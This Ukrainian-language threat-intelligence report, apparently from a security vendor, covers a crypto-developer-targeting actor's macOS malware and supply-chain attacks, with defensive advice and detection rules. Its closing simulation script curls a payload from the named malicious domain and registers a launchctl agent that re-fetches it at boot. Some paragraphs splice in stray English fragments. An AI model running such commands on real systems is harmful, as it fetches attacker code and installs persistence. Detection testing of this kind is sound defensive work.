SOC Prime Bias: Критично

29 May 2026 07:25 UTC

Інфраструктура розробки криптографічного програмного забезпечення в центрі уваги нового загрозового актора

Author Photo
SOC Prime Team linkedin icon Стежити
Інфраструктура розробки криптографічного програмного забезпечення в центрі уваги нового загрозового актора
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зломисник з фінансовими мотивами, що відстежується як JINX-0164, націлюється на розробників криптовалют через соціальну інженерію на LinkedIn, шкідливе ПЗ на macOS та компрометацію CI/CD. Група розгортає спеціальний Python RAT, відомий як AUDIOFIX, та бекдор на базі Go під назвою MINIRAT, обидва налаштовані на комунікацію з жорсткокодованими доменами командування та контролю. Після отримання доступу зловмисники викрадають облікові дані хмарних і розробницьких систем, змінюють репозиторії коду та навіть публікують шкідливі пакети npm, щоб розширити доступ та дозволити крадіжку криптовалюти. Кампанія відображає складну загрозу ланцюга поставок, спрямовану на життєвий цикл розробки програмного забезпечення.

Розслідування

Wiz CIRT відстежував вторгнення від початкового зв’язку на LinkedIn через доставку шкідливих посилань, виконання macOS навантажень, крадіжку облікових даних та бічний рух до репозиторіїв вихідного коду. Їх розслідування виявило скрипти-спадники, постійність через launchctl, та використання інструменту nord-stream для ексфільтрації секретних даних. Дослідники також ідентифікували декілька підроблених доменів, вузли виходу VPN та компрометацію ланцюга поставок, що включає пакет npm @velora-dex/sdk . Для підтримки виявлення та полювання на загрози були зібрані шляхи до файлів, хеші, домени та IP-адреси.

Захист

Рекомендовані заходи захисту включають моніторинг систем macOS для виявлення постійності, виявлення підозрілих LaunchAgents та блокування відомих шкідливих доменів і серверів командування й контролю. Організації повинні здійснювати підпис комітів, вмикати режим Vigilant на GitHub та відстежувати неперевірені коміти або незвичайні зміни в CI/CD робочих процесах. Використання VPN має бути обмежене затвердженими постачальниками, а для хмарних облікових записів і платформ розробки необхідно вимагати багатофакторну аутентифікацію. launchctl persistence, detecting suspicious LaunchAgents, and blocking the known malicious domains and command-and-control servers. Organizations should enforce signed commits, enable GitHub Vigilant Mode, and watch for unverified commits or unusual CI/CD workflow changes. VPN use should be limited to approved providers, and MFA should be required for cloud accounts and development platforms.

Реакція

Якщо виявлена ця діяльність, ізолюйте уражену систему macOS негайно, зберіть судові артефакти і анулюйте будь-які компрометовані облікові дані та API-токени. Командам з безпеки слід виконати повний огляд репозиторіїв коду для виявлення шкідливих комітів та видалити будь-які компрометовані пакети npm. Ідентифіковані домени командування й контролю слід заблокувати, а правила файрволу оновити для відмови у трафіку до шкідливих IP-адрес. Відповідні зацікавлені особи повинні бути повідомлені, та варто розглянути можливість обміну розвідувальною інформацією про загрози з надійними партнерами в галузі.

Потік атаки

Ми все ще оновлюємо цю частину. Підпишіться, щоб отримати сповіщення

Сповістити мене

Виявлення

Підозріле завантаження файлу за прямою IP-адресою (через проксі)

Команда SOC Prime
28 травня 2026 року

Можлива спроба зв’язку з доменом пошуку IP (через dns)

Команда SOC Prime
28 травня 2026 року

Спроба виконання MacOS Launchctl (через cmdline)

Команда SOC Prime
28 травня 2026 року

Можливе виконання за допомогою chmod і nohup однією командою (через cmdline)

Команда SOC Prime
28 травня 2026 року

Можлива маніпуляція з рядками у форматі Base64 [MacOS] (через cmdline)

Команда SOC Prime
28 травня 2026 року

Підозріла спроба виконання curl [MacOS] (через cmdline)

Команда SOC Prime
28 травня 2026 року

Індикатори компрометації (HashSha256) для виявлення: Коміт для компрометації: новий актор-загроза, що націлюється на інфраструктуру розробки програмного забезпечення у криптовалютній індустрії

Правила SOC Prime AI
28 травня 2026 року

Індикатори компрометації (SourceIP) для виявлення: Коміт для компрометації: новий актор-загроза, що націлюється на інфраструктуру розробки програмного забезпечення у криптовалютній індустрії

Правила SOC Prime AI
28 травня 2026 року

Індикатори компрометації (DestinationIP) для виявлення: Коміт для компрометації: новий актор-загроза, що націлюється на інфраструктуру розробки програмного забезпечення у криптовалютній індустрії

Правила SOC Prime AI
28 травня 2026 року

Виявлення стійкості шкідливого ПЗ AUDIOFIX та завантаження навантаження [створення процесу Linux]

Правила SOC Prime AI
28 травня 2026 року

Моделювання виконання

Необхідно: Перевірка телеметрії та базових показників перед початком повинна була пройти.

Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), розробленої для запуску правила виявлення. Команди та наратив повинні прямо відображати ідентифіковані TTP та прагнути генерувати саме ту телеметрію, яку очікує логіка виявлення.

  • Опис атаки та команди:

    1. Первісне проникнення: Зловмисник надсилає фішинговий електронний лист з посиланням на шкідливе ПЗ (T1566.004). Жертва клацає на посилання, яке веде на https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh.
    2. Завантаження навантаження: Термінал жертви виконує команду curl , яка безшумно завантажує скрипт.
    3. Налаштування стійкості: Скрипт реєструє агента запуску за допомогою launchctl submit, вбудовуючи ту саму команду, щоб навантаження перевантажувалося при кожному запуску (T1546.006). curl command so the payload is re‑downloaded on each boot (T1546.006).
    4. Виконання: Агент запуску працює з системними привілеями, виконуючи завантажений скрипт для компрометації хоста.
  • Скрипт регресійного тестування: (запуск на тестовій машині macOS; потрібні права адміністратора)

    #!/bin/bash
    set -euo pipefail
    
    # 1. Симуляція шкідливого завантаження curl (ніякого справжнього шкідливого коду)
    MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh"
    curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh
    
    # 2. Реєстрація агента запуску, який перевантажує скрипт при запуску
    launchctl submit -l com.malicious.audiofix 
        -p /usr/bin/curl -a -c 
        -t "30" 
        /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh
    
    echo "Шкідливий агент запуску зареєстрований. Перевірте SIEM для виявлення."
  • Команди очищення:

    # Видалити агента запуску
    launchctl remove com.malicious.audiofix || true
    
    # Видалити завантажений скрипт
    rm -f /tmp/audio-fix.sh
    
    echo "Очищення завершено."

Кінець звіту